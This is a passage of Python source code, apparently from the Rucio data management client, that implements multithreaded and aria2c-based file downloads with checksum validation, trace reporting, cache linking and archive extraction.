rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
# if one item wants to resolve archives we enable it for all items
resolve_archives = not all(item.get('no_resolve_archives') for item in merged_items)
merged_items_with_sources = self._get_sources(merged_items, resolve_archives=resolve_archives)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=resolve_archives)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger.info('Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
item.setdefault('destinations', set()).add((item['base_dir'], item['no_subdir']))
for metalink in metalinks:
did_to_options[metalink['did']] = item
metalinks = [metalinks]
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger.info('Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '')
return list(output_queue.queue)
logger.info('Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(1, num_threads + 1):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'traces_copy_out': traces_copy_out,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger.warning('Failed to start thread %d' % thread_num)
logger.debug(error)
try:
logger.debug('Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger.debug('%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, traces_copy_out, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
os.kill(os.getpgid(), signal.SIGINT)
break
except Exception as error:
logger.error('%sFailed to download item' % log_prefix)
logger.debug(error)
def _download_item(self, item, trace, traces_copy_out, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger.info('%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
dest_file_paths = item['dest_file_paths']
# appending trace to list reference, if the reference exists
if traces_copy_out is not None:
traces_copy_out.append(trace)
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
logger.info('%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger.debug("copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
send_trace(trace, self.client.host, self.client.user_agent)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger.warning('%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
trace['stateReason'] = 'No available sources'
self._send_trace(trace)
return item
# checking Pcache
storage_prefix = None
if pcache:
# to check only first replica is enough
pfn = sources[0]['pfn']
rse_name = sources[0]['rse']
# protocols are needed to extract deterministic part of the pfn
scheme = None
prots = self.client.get_protocols(rse_name)
for prot in prots:
if prot['scheme'] in pfn and prot['prefix'] in pfn:
scheme = prot['scheme']
storage_prefix = prot['prefix']
# proceed with the actual check
logger.info('Checking whether %s is in pcache' % dest_file_path)
pcache_state = None
hardlink_state = None
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path)
except Exception as e:
logger.warning('Pcache failure: %s' % str(e))
# if file found in pcache, send trace and return
if pcache_state == 0 and hardlink_state == 1:
logger.info('File found in pcache.')
item['clientState'] = 'FOUND_IN_PCACHE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'FOUND_IN_PCACHE'
self._send_trace(trace)
return item
else:
logger.info('File not found in pcache.')
# try different PFNs until one succeeded
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name)
except RucioException as error:
logger.warning('%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error))
trace['stateReason'] = str(error)
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
logger.info('%sTrying to download with %s from %s: %s ' % (log_prefix, scheme, rse_name, did_str))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme)
protocol.connect()
except Exception as error:
logger.warning('%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger.debug('scheme: %s, exception: %s' % (scheme, error))
trace['stateReason'] = str(error)
continue
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger.debug('%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=item.get('merged_options', {}).get('transfer_timeout'))
success = True
except Exception as error:
logger.debug(error)
trace['clientState'] = str(type(error).__name__)
trace['stateReason'] = str(error)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
rucio_checksum = item.get('adler32')
local_checksum = None
if rucio_checksum is None:
rucio_checksum = item.get('md5')
if rucio_checksum is None:
logger.warning('%sNo remote checksum available. Skipping validation.' % log_prefix)
else:
local_checksum = md5(temp_file_path)
else:
local_checksum = adler32(temp_file_path)
if rucio_checksum != local_checksum:
success = False
os.unlink(temp_file_path)
logger.warning('%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)
if not success:
logger.warning('%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger.error('%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger.debug("renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
# if the file was downloaded with success, it can be linked to pcache
if pcache:
logger.info('File %s is going to be registerred into pcache.' % dest_file_path)
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path)
logger.info('File %s is now registerred into pcache.' % first_dest_file_path)
except Exception as e:
logger.warning('Failed to load file to pcache: %s' % str(e))
for cur_dest_file_path in dest_file_path_iter:
logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
trace['stateReason'] = 'OK'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger.info('%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger.info('%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger.info('%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger.debug('%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger.error('Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger.debug('%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
merged_items_with_sources = self._get_sources(merged_items)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=False)
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger.error('Unknown exception during aria2c download')
self.logger.debug(error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tupel with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger.info('Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger.debug('Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger.debug(to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger.debug('Failed to start aria2c with port: %d' % port)
logger.debug('aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rcp: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger.info('File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger.warning('No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger.debug('Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
# ensure we didnt miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
if rucio_checksum == local_checksum:
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger.info('File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger.warning('Checksum validation failed for file: %s' % file_did_str)
logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger.error('Failed to download file: %s' % file_did_str)
logger.debug('Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger.info('Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
def _resolve_and_merge_input_items(self, items):
"""
This function takes the input items given to download_dids etc. and merges them
respecting their individual options. This way functions can operate on these items
in batch mode. E.g., list_replicas calls are reduced.
:param items: List of dictionaries. Each dictionary describing an input item
:returns: a dictionary with a dictionary that maps the input DIDs to options
and a list with a dictionary for each merged download item
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
# check mandatory options before doing any server calls
for item in items:
if item.get('resolve_archives') is not None:
logger.warning('resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
did = item.get('did', [])
if len(did) == 0:
if not item.get('filters', {}).get('scope'):
logger.debug(item)
raise InputValidationError('Item without did and filter/scope')
item['did'] = [None]
elif not isinstance(did, list):
item['did'] = [did]
distinct_keys = ['rse', 'force_scheme', 'nrandom']
all_resolved_did_strs = set()
did_to_options = {}
merged_items = []
download_info = {'did_to_options': did_to_options,
'merged_items': merged_items}
while len(items) > 0:
item = items.pop()
filters = item.get('filters', {})
item_dids = item.pop('did')
if item_dids[0] is None:
logger.debug('Resolving DIDs by using filter options')
item_dids = []
scope = filters.pop('scope')
for did_name in self.client.list_dids(scope, filters=filters, type='all'):
item_dids.append('%s:%s' % (scope, did_name))
base_dir = item.pop('base_dir', '.')
no_subdir = item.pop('no_subdir', False)
ignore_checksum = item.pop('ignore_checksum', False)
new_transfer_timeout = item.pop('transfer_timeout', None)
resolved_dids = item.setdefault('dids', [])
for did_str in item_dids:
did_scope, did_name = self._split_did_str(did_str)
tmp_did_names = []
if '*' in did_name:
filters['name'] = did_name
tmp_did_names = list(self.client.list_dids(did_scope, filters=filters, type='all'))
else:
tmp_did_names = [did_name]
for did_name in tmp_did_names:
resolved_did_str = '%s:%s' % (did_scope, did_name)
options = did_to_options.setdefault(resolved_did_str, {})
options.setdefault('destinations', set()).add((base_dir, no_subdir))
if resolved_did_str in all_resolved_did_strs:
# in this case the DID was already given in another item
# the options of this DID will be ignored and the options of the first item that contained the DID will be used
# another approach would be to compare the options and apply the more relaxed options
logger.debug('Ignoring further options of DID: %s' % resolved_did_str)
continue
options['ignore_checksum'] = (options.get('ignore_checksum') or ignore_checksum)
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
resolved_dids.append({'scope': did_scope, 'name': did_name})
all_resolved_did_strs.add(resolved_did_str)
if len(resolved_dids) == 0:
logger.warning('An item didnt have any DIDs after resolving the input. Ignoring it.')
logger.debug(item)
continue
was_merged = False
for merged_item in merged_items:
if all(item.get(k) == merged_item.get(k) for k in distinct_keys):
merged_item['dids'].extend(resolved_dids)
was_merged = True
break
if not was_merged:
item['dids'] = resolved_dids
merged_items.append(item)
return download_info
def _get_sources(self, merged_items, resolve_archives=True):
"""
Get sources (PFNs) of the DIDs.
:param merged_items: list of dictionaries. Each dictionary describes a bunch of DIDs to download
:returns: list of list of dictionaries.
"""
logger = self.logger
merged_items_with_sources = []
for item in merged_items:
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger.debug('schemes: %s' % schemes)
# extend RSE expression to exclude tape RSEs for non-admin accounts
rse_expression = item.get('rse')
if self.is_tape_excluded:
rse_expression = '*\istape=true' if not rse_expression else '(%s)\istape=true' % rse_expression
logger.debug('rse_expression: %s' % rse_expression)
# get PFNs of files and datasets
logger.debug('num DIDs for list_replicas call: %d' % len(item['dids']))
metalink_str = self.client.list_replicas(item['dids'],
schemes=schemes,
rse_expression=rse_expression,
client_location=self.client_location,
resolve_archives=resolve_archives,
resolve_parents=True,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
logger.debug('num resolved files: %s' % len(file_items))
nrandom = item.get('nrandom')
if nrandom:
logger.info('Selecting %d random replicas from DID(s): %s' % (nrandom, item['dids']))
random.shuffle(file_items)
file_items = file_items[0:nrandom]
merged_items_with_sources.append(file_items)
else:
merged_items_with_sources.append(file_items)
return merged_items_with_sources
def _prepare_items_for_download(self, did_to_options, merged_items_with_sources, resolve_archives=True):
"""
Optimises the amount of files to download
(This function is meant to be used as class internal only)
:param did_to_options: dictionary that maps each input DID to some input options
:param merged_items_with_sources: list of dictionaries. Each dictionary describes a bunch of DIDs to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
logger.warning('Archive resolution is enabled but no extraction tool is available. '
'Sources whose protocol doesnt support extraction wont be considered for download.')
# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
# list of all file item objects
all_file_items = []
# cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction
# this dict will contain all ids of cea's that definitely will be downloaded
cea_id_pure_to_fiids = {}
# this dict will contain ids of cea's that have higher prioritised non cea sources
cea_id_mixed_to_fiids = {}
all_input_dids = set(did_to_options.keys())
all_dest_file_paths = set()
# get replicas for every file of the given dids
logger.debug('num list_replicas calls: %d' % len(merged_items_with_sources))
for file_items in merged_items_with_sources:
all_file_items.extend(file_items)
for file_item in file_items:
# parent_dids contains all parents, so we take the intersection with the input dids
dataset_did_strs = file_item.setdefault('parent_dids', set())
dataset_did_strs.intersection_update(all_input_dids)
file_did_str = file_item['did']
file_did_scope, file_did_name = self._split_did_str(file_did_str)
file_item['scope'] = file_did_scope
file_item['name'] = file_did_name
logger.debug('Queueing file: %s' % file_did_str)
logger.debug('real parents: %s' % dataset_did_strs)
logger.debug('options: %s' % did_to_options)
# prepare destinations:
# if datasets were given: prepare the destination paths for each dataset
options = None
dest_file_paths = file_item.get('dest_file_paths', set())
for dataset_did_str in dataset_did_strs:
options = did_to_options.get(dataset_did_str)
if not options:
logger.error('No input options available for %s' % dataset_did_str)
continue
destinations = options['destinations']
dataset_scope, dataset_name = self._split_did_str(dataset_did_str)
paths = [os.path.join(self._prepare_dest_dir(dest[0], dataset_name, file_did_name, dest[1]), file_did_name) for dest in destinations]
if any(path in all_dest_file_paths for path in paths):
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.update(paths)
dest_file_paths.update(paths)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', dataset_scope)
file_item.setdefault('dataset_name', dataset_name)
# if no datasets were given only prepare the given destination paths
if len(dataset_did_strs) == 0:
options = did_to_options.get(file_did_str)
if not options:
logger.error('No input options available for %s' % file_did_str)
continue
destinations = options['destinations']
paths = [os.path.join(self._prepare_dest_dir(dest[0], file_did_scope, file_did_name, dest[1]), file_did_name) for dest in destinations]
if any(path in all_dest_file_paths for path in paths):
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.update(paths)
dest_file_paths.update(paths)
if options is None:
continue
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
# the file did str ist not an unique key for this dict because multiple calls of list_replicas
# could result in the same DID multiple times. So we're using the id of the dictionary objects
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
# workaround since we dont have the archive DID use the part behind the last slash of the PFN
